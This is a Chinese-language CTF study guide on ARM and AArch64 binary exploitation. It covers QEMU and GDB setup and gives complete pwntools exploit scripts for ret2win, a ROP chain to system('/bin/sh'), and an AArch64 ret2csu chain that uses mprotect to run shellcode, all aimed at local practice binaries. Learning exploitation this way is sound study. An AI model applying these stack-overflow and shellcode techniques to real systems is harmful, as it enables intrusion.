ARM & AArch64 PWN 学习指南<\/h1>

1. QEMU 环境配置<\/h2>

QEMU 两种运行模式<\/h3>

qemu-user<\/strong>: 只提供用户态仿真<\/li>

qemu-system<\/strong>: 可以进行完整的系统仿真<\/li> <\/ul>
安装命令<\/h3>
apt search "libc6-"<\/span> | grep "arm"<\/span> <\/span><\/span>sudo apt-get install qemu qemu-user qemu-user-static <\/span><\/span><\/code><\/pre>本地运行命令<\/h3> ARM 程序: qemu-arm -L \/usr\/arm-linux-gnueabi .\/pwn <\/span><\/span><\/code><\/pre><\/li> AArch64 程序: qemu-aarch64 -L \/usr\/aarch64-linux-gnu\/ .\/pwn <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. GDB 调试配置<\/h2> 安装<\/h3> sudo apt-get install gdb-multiarch <\/span><\/span><\/code><\/pre>调试命令<\/h3> gdb-multiarch pwn -q <\/span><\/span>set architecture arm # 或 set architecture aarch64<\/span> <\/span><\/span>target remote localhost:1234 <\/span><\/span><\/code><\/pre>3. ARM 架构基础<\/h2> 寄存器与x86对比<\/h3> r0-r2<\/code>: 储存前三个参数<\/li> pc<\/code>: 相当于x86的rip<\/code><\/li> sp<\/code>: 栈顶指针<\/li> r11\/fp<\/code>: 类似于x86的rbp<\/code><\/li> <\/ul> 常见指令<\/h3> bl<\/code>: 相当于x86的call<\/code><\/li> pop {fp, pc}<\/code>: 将栈顶值弹出到fp<\/code>，然后弹出下个值到pc<\/code><\/li> <\/ul> 4. 基础漏洞利用技术<\/h2> ret2win (ARM ret2text)<\/h3> 思路<\/strong>: 栈溢出+后门函数直接调用<\/li> 关键点<\/strong>: 确定溢出偏移量<\/li> 定位后门函数地址<\/li> <\/ul> <\/li> 示例exp<\/strong>:<\/li> <\/ol> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>context(arch=<\/span>'arm'<\/span>, os=<\/span>'linux'<\/span>) <\/span><\/span>p =<\/span> process(["qemu-arm"<\/span>,"-L"<\/span>,"\/usr\/arm-linux-gnueabi"<\/span>,".\/pwn"<\/span>]) <\/span><\/span> <\/span><\/span>pl =<\/span> "a"<\/span> *<\/span> 0x24<\/span> +<\/span> p32(0x000105EC<\/span>) # 后门函数地址<\/span> <\/span><\/span>p.<\/span>sendafter('>'<\/span>, pl) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>简单ROP (ARM)<\/h3> 思路<\/strong>: 通过ROP链调用system("\/bin\/sh")<\/li> 步骤<\/strong>: 使用cyclic确定偏移量(示例中为112)<\/li> 寻找gadget和字符串地址<\/li> <\/ul> <\/li> 示例exp<\/strong>:<\/li> <\/ol> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>context(arch=<\/span>'arm'<\/span>, os=<\/span>'linux'<\/span>) <\/span><\/span>p =<\/span> process(["qemu-arm"<\/span>,"-L"<\/span>,"\/usr\/arm-linux-gnueabi"<\/span>,".\/pwn"<\/span>]) <\/span><\/span> <\/span><\/span>r0_r4 =<\/span> 0x00020904<\/span> # pop {r0, r4, pc}<\/span> <\/span><\/span>bin_sh =<\/span> 0x0006c384<\/span> # "\/bin\/sh"字符串地址<\/span> <\/span><\/span>system =<\/span> 0x00010BA8<\/span> # system函数地址<\/span> <\/span><\/span> <\/span><\/span>pl =<\/span> 'a'<\/span> *<\/span> 112<\/span> +<\/span> p32(r0_r4) +<\/span> p32(bin_sh) +<\/span> p32(0<\/span>) +<\/span> p32(system) <\/span><\/span>p.<\/span>send(pl) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>5. AArch64 高级利用技术<\/h2> ret2csu (AArch64)<\/h3> 思路<\/strong>: 利用类似x86的csu_init函数构造ROP链<\/p> <\/li> 关键点<\/strong>:<\/p> AArch64参数寄存器: x0-x2<\/code><\/li> 使用mprotect修改内存权限后执行shellcode<\/li> <\/ul> <\/li> csu gadget分析<\/strong>:<\/p> LDP X19, X20, [SP,#var_s10]<\/code>: 将sp+0x10处数据给x19,sp+0x18处数据给x20<\/li> 类似指令依次处理其他寄存器<\/li> 最后通过x21<\/code>(call_got)跳转并比较x19<\/code>与x20<\/code><\/li> <\/ul> <\/li> csu函数模板<\/strong>:<\/p> <\/li> <\/ol> def<\/span> csu<\/span>(x19, x20, call_got, x2, x1, x0, call_shell): <\/span><\/span> pl =<\/span> 'a'<\/span> *<\/span> offset <\/span><\/span> pl +=<\/span> p64(csu_down) <\/span><\/span> pl +=<\/span> p64(0<\/span>) +<\/span> p64(csu_up) <\/span><\/span> pl +=<\/span> p64(x19) +<\/span> p64(x20) # x19 x20<\/span> <\/span><\/span> pl +=<\/span> p64(call_got) +<\/span> p64(x2) # x21 x22<\/span> <\/span><\/span> pl +=<\/span> p64(x1) +<\/span> p64(x0) # x23 x24<\/span> <\/span><\/span> pl +=<\/span> p64(0<\/span>) +<\/span> p64(call_shell) <\/span><\/span> pl +=<\/span> p64(0<\/span>) *<\/span> 6<\/span> <\/span><\/span> return<\/span> pl <\/span><\/span><\/code><\/pre> 完整exp示例<\/strong>:<\/li> <\/ol> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>context.<\/span>arch =<\/span> 'aarch64'<\/span> <\/span><\/span>p =<\/span> process(["qemu-aarch64"<\/span>,"-L"<\/span>,"\/usr\/aarch64-linux-gnu\/"<\/span>,".\/pwn"<\/span>]) <\/span><\/span> <\/span><\/span>mprotect_plt =<\/span> 0x400600<\/span> <\/span><\/span>mprotect_got =<\/span> 0x411030<\/span> <\/span><\/span>csu_down =<\/span> 0x4008CC<\/span> <\/span><\/span>csu_up =<\/span> 0x4008AC<\/span> <\/span><\/span>offset =<\/span> 0x48<\/span> <\/span><\/span>shellcode_addr =<\/span> 0x411068<\/span> <\/span><\/span> <\/span><\/span># 第一次read: 写入shellcode<\/span> <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>aarch64.<\/span>sh()) <\/span><\/span>p.<\/span>sendafter('Name:'<\/span>, shellcode) <\/span><\/span> <\/span><\/span># 第二次read: 构造ROP链<\/span> <\/span><\/span>pl =<\/span> csu(0<\/span>, 1<\/span>, mprotect_got, 7<\/span>, 0x1000<\/span>, shellcode_addr, shellcode_addr) <\/span><\/span>p.<\/span>send(pl) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>6. 实用技巧<\/h2> 调试建议<\/strong>:<\/p> 异架构调试时直接下断点然后运行过去<\/li> 使用cyclic确定偏移量更可靠<\/li> <\/ul> <\/li> 常用工具函数<\/strong>:<\/p> <\/li> <\/ol> s =<\/span> lambda<\/span> data: p.<\/span>send(str(data)) <\/span><\/span>sa =<\/span> lambda<\/span> delim, data: p.<\/span>sendafter(str(delim), str(data)) <\/span><\/span>sl =<\/span> lambda<\/span> data: p.<\/span>sendline(str(data)) <\/span><\/span>sla =<\/span> lambda<\/span> delim, data: p.<\/span>sendlineafter(str(delim), str(data)) <\/span><\/span>r =<\/span> lambda<\/span> num: p.<\/span>recv(num) <\/span><\/span>uu32 =<\/span> lambda<\/span> data: u32(data.<\/span>ljust(4<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) <\/span><\/span>uu64 =<\/span> lambda<\/span> data: u64(data.<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) <\/span><\/span>leak =<\/span> lambda<\/span> name, addr: log.<\/span>success('<\/span>{}<\/span> = <\/span>{:#x}<\/span>'<\/span>.<\/span>format(name, addr)) <\/span><\/span><\/code><\/pre> 上下文设置<\/strong>:<\/li> <\/ol> context.<\/span>terminal =<\/span> ['gnome-terminal'<\/span>, '-x'<\/span>, 'sh'<\/span>, '-c'<\/span>] <\/span><\/span>context(arch=<\/span>'arm\/aarch64'<\/span>, os=<\/span>'linux'<\/span>) <\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span> <\/span><\/span><\/code><\/pre>通过以上内容，您可以系统性地学习ARM和AArch64架构下的PWN技术，从基础到进阶，掌握各种漏洞利用方法。<\/p>